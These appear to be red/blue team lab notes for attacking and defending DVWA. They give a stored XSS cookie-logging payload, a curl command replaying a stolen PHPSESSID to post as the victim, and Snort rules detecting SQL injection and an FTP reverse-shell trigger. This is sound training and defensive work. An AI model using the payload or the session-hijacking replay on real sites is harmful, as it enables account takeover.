-------------------------------------------------------------------
ATTACK (RED)
-------------------------------------------------------------------

Attacker Login

Change security to low

Inject Payload
    <script>console.log(document.cookie)</script>

Logout

New user logs in

Go to XSS page

Script is executed, cookie is sent to attacker (copy it manually for now)

Attacker user his machine to add a comment using cookie
    curl -X POST -b "security=low; PHPSESSID=9ecc84081433870a847d9c096762a91f" -d "txtName=WhoAmI&mtxMessage=You%27ve+been+hacked&btnSign=Sign+Guestbook" http://10.30.0.235/dvwa/vulnerabilities/xss_s/

-------------------------------------------------------------------
DEFEND (BLUE)
-------------------------------------------------------------------
In DMZ interface, remove all extra "LANDM Categories"

SQLi Rule(s): 
    alert tcp any any -> 10.30.0.235 80 (content:"/";http_uri;flow:to_server,established;pcre:"/('|%27)(\s|%20|\+)*or(\s|%20|\+)*('|%27)1('|%27)(\s|%20|\+)*(=|%3D)(\s|%20|\+)*('|%27)1/i";msg:"Possible SQL Injection Attack Detected";sid:1000001;rev:1)

Reverse Shell Rule(s):

    alert tcp any any -> 10.30.0.235 21 (msg:"Possible Reverse Shell Attack Detected";flow:to_server,established;content:"USER ";nocase;pcre:"/^USER\s+[^\r\n]*:\)\r?$/sm";sid:1000002;rev:1)
    
-------------------------------------------------------------------
 
https://raw.githubusercontent.com/syedmuhammadhussamasifnaqvi/cyberproject/main/command.txt
